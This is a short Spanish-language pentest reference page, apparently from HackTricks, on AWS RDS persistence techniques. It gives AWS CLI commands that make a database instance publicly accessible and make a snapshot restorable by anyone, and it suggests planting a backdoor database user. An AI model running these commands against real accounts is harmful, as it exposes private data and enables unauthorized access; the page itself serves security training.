# AWS - Persistencia en RDS

{{#include ../../../banners/hacktricks-training.md}}

## RDS

Para más información, consulta:

{{#ref}}
../aws-services/aws-relational-database-rds-enum.md
{{#endref}}

### Hacer que la instancia sea accesible públicamente: `rds:ModifyDBInstance`

Un atacante con este permiso puede **modificar una instancia de RDS existente para habilitar la accesibilidad pública**.
```bash
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately
```
### Crear un usuario administrador dentro de la DB

Un atacante podría **crear un usuario dentro de la DB** para que, incluso si se modifica la contraseña del usuario maestro, **no pierda el acceso** a la base de datos.

### Hacer la instantánea pública
```bash
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
```
{{#include ../../../banners/hacktricks-training.md}}